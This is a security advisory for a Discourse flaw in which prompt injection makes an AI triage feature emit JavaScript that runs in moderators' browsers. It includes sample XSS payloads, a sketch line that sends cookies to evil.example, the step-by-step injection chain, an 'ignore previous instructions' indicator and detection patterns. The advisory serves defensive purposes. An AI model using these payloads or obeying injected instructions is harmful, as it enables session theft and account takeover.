CVE-2026-27740 Overview
CVE-2026-27740 is a Cross-Site Scripting (XSS) vulnerability in Discourse, the popular open-source discussion platform. The vulnerability exists in the AI-powered content triage feature, where raw output from a Large Language Model (LLM) is rendered using htmlSafe in the Review Queue interface without adequate sanitization. This allows attackers to leverage prompt injection techniques to force the AI to return malicious JavaScript payloads that execute when Staff members (Administrators or Moderators) view flagged posts.
Critical Impact
Attackers can execute arbitrary JavaScript in the browser context of privileged Staff users, potentially leading to session hijacking, administrative account compromise, or unauthorized configuration changes on Discourse installations using AI triage automation.
Affected Products
- Discourse versions prior to 2026.3.0-latest.1
- Discourse versions prior to 2026.2.1
- Discourse versions prior to 2026.1.2
Discovery Timeline
- 2026-03-19 - CVE-2026-27740 published to NVD
- 2026-03-19 - Last updated in NVD database
Technical Details for CVE-2026-27740
Vulnerability Analysis
This vulnerability represents an emerging attack surface where AI/LLM integrations introduce new security risks into web applications. The core issue stems from a trust boundary violation: the Discourse AI plugin treats LLM-generated content as safe when it should be considered untrusted user input. When the AI triage automation processes flagged posts, it passes the LLM's response directly into an internationalization (I18n) template that gets rendered in the Review Queue using htmlSafe, which explicitly bypasses HTML encoding protections.
The attack chain requires an attacker to craft malicious post content designed to manipulate the LLM through prompt injection. When the AI processes this content for triage, it can be coerced into including malicious HTML or JavaScript in its response. Since Staff members rely on the Review Queue to moderate content, they will inevitably view the flagged post, triggering the XSS payload execution in their authenticated browser session.
Root Cause
The root cause is the absence of output sanitization on LLM-generated content before it is rendered in the browser. The vulnerable code paths in multiple files (llm_triage.rb, flag_post.rb) directly interpolated the llm_response and automation_name variables into the I18n template without applying HTML escaping. This violates the security principle that all dynamic content—regardless of source—must be sanitized before being rendered as HTML.
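The effect of the fix can be seen with a minimal, self-contained Ruby snippet. The payload below is illustrative only; it simply demonstrates what ERB::Util.html_escape does to HTML metacharacters:

```ruby
require "erb"

# An attribute-based XSS payload of the kind an injected LLM response could carry.
payload = "<img src=x onerror=alert(1)>"

# html_escape converts <, >, &, " and ' to HTML entities, so the browser
# renders the payload as inert text instead of executing it.
escaped = ERB::Util.html_escape(payload)

puts escaped  # => &lt;img src=x onerror=alert(1)&gt;
```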
Attack Vector
The attack is network-based and requires an authenticated user account (low privileges) to submit the malicious content. The exploitation requires user interaction, as a Staff member must view the flagged post in the Review Queue. The attack flow proceeds as follows:
- Attacker creates a post containing prompt injection payloads designed to manipulate the LLM
- The AI triage automation processes the post and the LLM is tricked into including malicious script tags in its response
- The response is stored as part of the flag reason without sanitization
- When a Staff member opens the Review Queue and views the flagged post, the malicious JavaScript executes in their browser
- The attacker can then steal session tokens, perform actions as the administrator, or further compromise the platform
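The flow above can be sketched in plain Ruby. The template string, variable names, and attacker URL below are illustrative stand-ins, not Discourse code; the real template lives in the discourse_automation locale files:

```ruby
require "erb"

# Hypothetical stand-in for the I18n template used to build the flag reason.
TEMPLATE = "Flagged by %{automation_name}: %{llm_response}"

# Simulated LLM output after a successful prompt injection.
llm_result = "<script>document.location='https://evil.example/?c='+document.cookie</script>"

# Vulnerable path: raw interpolation, so the payload survives into the stored flag reason.
unsafe_reason = format(TEMPLATE, { automation_name: "llm_triage", llm_response: llm_result })

# Patched path: escape before interpolation, so the payload is neutralized.
safe_reason = format(TEMPLATE, { automation_name: "llm_triage",
                                 llm_response: ERB::Util.html_escape(llm_result) })

puts unsafe_reason.include?("<script>")  # true
puts safe_reason.include?("<script>")    # false
```

Because the unescaped string is later rendered with htmlSafe, the vulnerable path yields stored XSS that fires in the Staff member's session.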
The following patch demonstrates how the fix properly escapes LLM output using ERB::Util.html_escape:
  I18n.t(
    "discourse_automation.scriptables.llm_triage.flagged_post",
    base_path: Discourse.base_path,
-   llm_response: result,
+   llm_response: ERB::Util.html_escape(result),
    automation_id: automation&.id.to_s,
-   automation_name: automation&.name.to_s,
+   automation_name: ERB::Util.html_escape(automation&.name.to_s),
  )
  if !flagged_by_tool
Source: GitHub Commit Update
Detection Methods for CVE-2026-27740
Indicators of Compromise
- Unusual script tags or JavaScript code appearing in flag reasons within the Review Queue
- Unexpected HTTP requests or outbound connections from Staff browsers after viewing flagged content
- Posts containing suspicious prompt injection patterns such as "ignore previous instructions" or embedded HTML tags
- Anomalous administrative actions performed without corresponding legitimate administrator sessions
Detection Strategies
- Implement Content Security Policy (CSP) headers to detect and block inline script execution attempts
- Monitor web application logs for patterns indicating prompt injection attempts in user-submitted content
- Review browser console logs from Staff workstations for JavaScript errors or unauthorized script execution
- Audit the reviewable_scores database table for flag reasons containing HTML or script tags
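The audit step can be approximated with a simple pattern scan. This is a generic sketch, not a Discourse API: the indicator list is an assumption, and how you export flag-reason text from the reviewable_scores table is left to your environment:

```ruby
# Common stored-XSS indicators to look for in flag-reason text.
# The pattern list is illustrative and intentionally narrow; tune it for your data.
XSS_INDICATORS = [
  /<script\b/i,
  /\bon(?:error|load|click)\s*=/i,
  /javascript:/i,
  /<iframe\b/i,
].freeze

def suspicious_reason?(text)
  XSS_INDICATORS.any? { |pattern| text =~ pattern }
end

puts suspicious_reason?("Post flagged: spam about watches")          # false
puts suspicious_reason?("Flagged <script>fetch('//evil')</script>")  # true
```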
Monitoring Recommendations
- Enable detailed logging for all AI triage automation activities and flag creation events
- Set up alerts for any content in the Review Queue containing potential XSS vectors like <script>, <img onerror, or event handlers
- Monitor for unusual session activity from Staff accounts, particularly after Review Queue interactions
- Implement real-time monitoring of CSP violation reports to detect exploitation attempts
How to Mitigate CVE-2026-27740
Immediate Actions Required
- Update Discourse to version 2026.3.0-latest.1, 2026.2.1, or 2026.1.2 immediately
- If immediate patching is not possible, disable AI triage automation scripts as a temporary workaround
- Review recent Review Queue activity for any suspicious flag reasons that may contain script content
- Invalidate and rotate Staff session tokens if exploitation is suspected
Patch Information
Discourse has released patches across multiple release tracks. The fix applies ERB::Util.html_escape to all LLM-generated content before it is interpolated into templates. The patches address the vulnerability in multiple code paths including plugins/discourse-ai/lib/automation/llm_triage.rb, plugins/discourse-ai/lib/personas/tools/flag_post.rb, and plugins/discourse-ai/lib/agents/tools/flag_post.rb.
Workarounds
- Temporarily disable AI triage automation scripts via the Discourse admin panel until patching is complete
- Implement a Web Application Firewall (WAF) rule to strip or block potential XSS payloads in Review Queue responses
- Restrict Review Queue access to a minimal number of Staff members until the vulnerability is patched
- Enable strict Content Security Policy headers to mitigate the impact of any successful XSS exploitation
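A restrictive CSP can be expressed with the standard Rails DSL. The snippet below is a generic Rails sketch for illustration; Discourse manages its CSP through site settings rather than this initializer, and the report endpoint path is an assumption:

```ruby
# config/initializers/content_security_policy.rb — generic Rails sketch,
# not Discourse's own configuration mechanism.
Rails.application.config.content_security_policy do |policy|
  policy.script_src :self          # blocks inline <script> injected via XSS
  policy.report_uri "/csp-report"  # collects violation reports for monitoring
end
```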
# Disable AI triage automation via the Rails console (temporary workaround)
cd /var/discourse
./launcher enter app
rails c
# In the console, disable the llm_triage automation scripts.
# Note: the automation model is namespaced under DiscourseAutomation.
DiscourseAutomation::Automation.where(script: "llm_triage").update_all(enabled: false)